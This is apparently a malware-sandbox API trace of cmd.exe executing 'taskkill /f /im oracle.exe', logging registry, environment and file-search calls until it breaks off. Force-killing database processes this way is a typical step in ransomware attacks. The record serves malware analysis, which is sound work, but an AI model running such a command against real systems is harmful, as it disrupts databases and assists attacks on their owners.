[0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x0, lpData=0x1fe800*=0x1, lpcbData=0x1fe7f8*=0x1000) returned 0x2 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x0, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x9, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x4, lpData=0x1fe800*=0x9, lpcbData=0x1fe7f8*=0x4) returned 0x0 [0060.481] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1fe7fc, lpData=0x1fe800, lpcbData=0x1fe7f8*=0x1000 | out: lpType=0x1fe7fc*=0x0, lpData=0x1fe800*=0x9, lpcbData=0x1fe7f8*=0x1000) returned 0x2 [0060.481] RegCloseKey (hKey=0x68) returned 0x0 [0060.481] time (in: timer=0x0 | out: timer=0x0) returned 0x5d97ebac [0060.481] srand (_Seed=0x5d97ebac) [0060.481] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im oracle.exe" [0060.481] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c taskkill /f /im oracle.exe" [0060.481] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.482] GetProcessHeap () returned 0x400000 [0060.482] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x210) returned 0x412040 [0060.482] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x412048, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0060.482] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.482] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.482] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.482] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0060.482] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0060.482] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0060.482] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0060.482] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0060.482] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0060.482] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0060.482] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0060.482] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0060.482] GetProcessHeap () returned 0x400000 [0060.482] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x412b18 | out: hHeap=0x400000) returned 1 [0060.482] GetEnvironmentStringsW () returned 0x412258* [0060.482] GetProcessHeap () returned 0x400000 [0060.482] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xae2) returned 0x414bb8 [0060.482] FreeEnvironmentStringsW (penv=0x412258) returned 1 [0060.482] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0060.483] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0060.483] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0060.483] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0060.483] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0060.483] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0060.483] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0060.483] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0060.483] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0060.483] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0060.483] GetProcessHeap () returned 0x400000 [0060.483] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x54) returned 0x4156a8 [0060.483] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ff5c0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.483] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ff5c0, lpFilePart=0x1ff5bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ff5bc*="Desktop") returned 0x25 [0060.483] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.483] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ff33c | out: lpFindFileData=0x1ff33c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x411ec0 [0060.483] FindClose (in: hFindFile=0x411ec0 | out: hFindFile=0x411ec0) returned 1 [0060.483] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ff33c | out: lpFindFileData=0x1ff33c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x411ec0 [0060.483] FindClose (in: hFindFile=0x411ec0 | out: hFindFile=0x411ec0) returned 1 [0060.483] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0060.483] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ff33c | out: lpFindFileData=0x1ff33c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x7e416480, ftLastAccessTime.dwHighDateTime=0x1d57b18, ftLastWriteTime.dwLowDateTime=0x7e416480, ftLastWriteTime.dwHighDateTime=0x1d57b18, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x411ec0 [0060.484] FindClose (in: hFindFile=0x411ec0 | out: hFindFile=0x411ec0) returned 1 [0060.484] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0060.484] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0060.484] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0060.484] GetProcessHeap () returned 0x400000 [0060.484] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x414bb8 | out: hHeap=0x400000) returned 1 [0060.484] GetEnvironmentStringsW () returned 0x4140c8* [0060.484] GetProcessHeap () returned 0x400000 [0060.484] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xb36) returned 0x415f08 [0060.484] FreeEnvironmentStringsW (penv=0x4140c8) returned 1 [0060.484] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0060.484] GetProcessHeap () returned 0x400000 [0060.484] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x4156a8 | out: hHeap=0x400000) returned 1 [0060.484] GetProcessHeap () returned 0x400000 [0060.484] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x400e) returned 0x416a48 [0060.485] GetProcessHeap () returned 0x400000 [0060.485] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x42) returned 0x411ec0 [0060.485] GetProcessHeap () returned 0x400000 [0060.485] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x416a48 | out: hHeap=0x400000) returned 1 [0060.485] GetConsoleOutputCP () returned 0x1b5 [0060.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0060.726] GetUserDefaultLCID () returned 0x409 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49f04950, cchData=8 | out: lpLCData=":") returned 2 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ff700, cchData=128 | out: lpLCData="0") returned 2 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ff700, cchData=128 | out: lpLCData="0") returned 2 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ff700, cchData=128 | out: lpLCData="1") returned 2 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49f04940, cchData=8 | out: lpLCData="/") returned 2 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49f04d80, cchData=32 | out: lpLCData="Mon") returned 4 [0060.727] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49f04d40, cchData=32 | out: lpLCData="Tue") returned 4 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49f04d00, cchData=32 | out: lpLCData="Wed") returned 4 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49f04cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49f04c80, cchData=32 | out: lpLCData="Fri") returned 4 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49f04c40, cchData=32 | out: lpLCData="Sat") returned 4 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49f04c00, cchData=32 | out: lpLCData="Sun") returned 4 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49f04930, cchData=8 | out: lpLCData=".") returned 2 [0060.728] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49f04920, cchData=8 | out: lpLCData=",") returned 2 [0060.728] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0060.729] GetProcessHeap () returned 0x400000 [0060.729] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x20c) returned 0x412dd0 [0060.729] GetConsoleTitleW (in: lpConsoleTitle=0x412dd0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76c20000 [0060.729] GetProcAddress (hModule=0x76c20000, lpProcName="CopyFileExW") returned 0x76c53b92 [0060.729] GetProcAddress (hModule=0x76c20000, lpProcName="IsDebuggerPresent") returned 0x76c34a5d [0060.729] GetProcAddress (hModule=0x76c20000, lpProcName="SetConsoleInputExeNameW") returned 0x76c4a79d [0060.730] GetProcessHeap () returned 0x400000 [0060.730] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x400a) returned 0x416a48 [0060.730] GetProcessHeap () returned 0x400000 [0060.730] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x416a48 | out: hHeap=0x400000) returned 1 [0060.730] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0060.730] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0060.730] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0060.730] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0060.730] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0060.730] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0060.730] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0060.730] GetProcessHeap () returned 0x400000 [0060.730] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x58) returned 0x412fe8 [0060.730] GetProcessHeap () returned 0x400000 [0060.730] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x1a) returned 0x415748 [0060.731] GetProcessHeap () returned 0x400000 [0060.731] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x2e) returned 0x413048 [0060.732] GetConsoleTitleW (in: lpConsoleTitle=0x1ff3f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.732] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.732] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.732] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.732] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.732] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.732] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.732] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.732] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.732] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.732] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.732] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.732] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.732] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.732] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.732] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.732] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.732] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.732] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.733] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.733] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.733] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.733] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.733] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.733] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.733] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.733] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.733] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.733] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.733] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.733] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.733] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.733] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.733] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.733] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.733] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.733] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.733] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.733] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.733] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.733] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.733] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.733] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.733] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0060.733] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0060.733] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0060.733] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0060.733] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0060.733] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0060.733] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0060.733] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0060.733] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0060.733] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0060.733] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0060.734] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0060.734] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0060.734] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0060.734] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0060.734] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0060.734] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0060.734] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0060.734] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0060.734] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0060.734] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0060.734] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0060.734] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0060.734] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0060.734] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0060.734] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0060.734] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0060.734] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0060.734] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0060.734] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0060.734] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0060.734] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0060.734] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0060.734] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0060.734] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0060.734] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0060.734] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0060.734] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0060.734] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0060.734] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0060.734] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0060.734] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0060.734] _wcsicmp (_String1="taskkill", _String2="FOR") returned 14 [0060.734] _wcsicmp (_String1="taskkill", _String2="IF") returned 11 [0060.734] _wcsicmp (_String1="taskkill", _String2="REM") returned 2 [0060.736] GetProcessHeap () returned 0x400000 [0060.736] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x210) returned 0x413080 [0060.736] GetProcessHeap () returned 0x400000 [0060.736] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x40) returned 0x413298 [0060.737] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0060.737] GetProcessHeap () returned 0x400000 [0060.737] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x418) returned 0x4007f0 [0060.737] SetErrorMode (uMode=0x0) returned 0x0 [0060.737] SetErrorMode (uMode=0x1) returned 0x0 [0060.737] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x4007f8, lpFilePart=0x1fef18 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1fef18*="Desktop") returned 0x25 [0060.737] SetErrorMode (uMode=0x0) returned 0x1 [0060.737] GetProcessHeap () returned 0x400000 [0060.737] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x4007f0, Size=0x66) returned 0x4007f0 [0060.737] GetProcessHeap () returned 0x400000 [0060.737] RtlSizeHeap (HeapHandle=0x400000, Flags=0x0, MemoryPointer=0x4007f0) returned 0x66 [0060.737] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0060.737] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0060.737] GetProcessHeap () returned 0x400000 [0060.737] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x120) returned 0x4132e0 [0060.737] GetProcessHeap () returned 0x400000 [0060.737] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x238) returned 0x400860 [0060.743] GetProcessHeap () returned 0x400000 [0060.743] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x400860, Size=0x122) returned 0x400860 [0060.743] GetProcessHeap () returned 0x400000 [0060.743] RtlSizeHeap (HeapHandle=0x400000, Flags=0x0, MemoryPointer=0x400860) returned 0x122 [0060.743] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0060.743] GetProcessHeap () returned 0x400000 [0060.743] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0xe0) returned 0x413408 [0060.744] GetProcessHeap () returned 0x400000 [0060.744] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x413408, Size=0x76) returned 0x413408 [0060.744] GetProcessHeap () returned 0x400000 [0060.744] RtlSizeHeap (HeapHandle=0x400000, Flags=0x0, MemoryPointer=0x413408) returned 0x76 [0060.744] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.744] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x1fec94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1fec94) returned 0xffffffff [0060.745] GetLastError () returned 0x2 [0060.745] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\taskkill", fInfoLevelId=0x1, lpFindFileData=0x1fec94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1fec94) returned 0xffffffff [0060.745] GetLastError () returned 0x2 [0060.745] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0060.745] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.*", fInfoLevelId=0x1, lpFindFileData=0x1fec94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1fec94) returned 0x413488 [0060.745] GetProcessHeap () returned 0x400000 [0060.745] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x14) returned 0x4134c8 [0060.745] FindClose (in: hFindFile=0x413488 | out: hFindFile=0x413488) returned 1 [0060.745] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.COM", fInfoLevelId=0x1, lpFindFileData=0x1fec94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1fec94) returned 0xffffffff [0060.746] GetLastError () returned 0x2 [0060.746] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\taskkill.EXE", fInfoLevelId=0x1, lpFindFileData=0x1fec94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1fec94) returned 0x413488 [0060.746] GetProcessHeap () returned 0x400000 [0060.746] RtlReAllocateHeap (Heap=0x400000, Flags=0x0, Ptr=0x4134c8, Size=0x4) returned 0x4134c8 [0060.746] FindClose (in: hFindFile=0x413488 | out: hFindFile=0x413488) returned 1 [0060.746] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0060.746] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0060.746] GetConsoleTitleW (in: lpConsoleTitle=0x1ff18c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0060.747] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ff014, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ff0dc | out: lpAttributeList=0x1ff014, lpSize=0x1ff0dc) returned 1 [0060.747] UpdateProcThreadAttribute (in: lpAttributeList=0x1ff014, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ff0d4, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1ff014, lpPreviousValue=0x0) returned 1 [0060.747] GetStartupInfoW (in: lpStartupInfo=0x1fefd0 | out: lpStartupInfo=0x1fefd0*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0060.747] GetProcessHeap () returned 0x400000 [0060.747] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x8, Size=0x18) returned 0x413488 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0060.747] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", 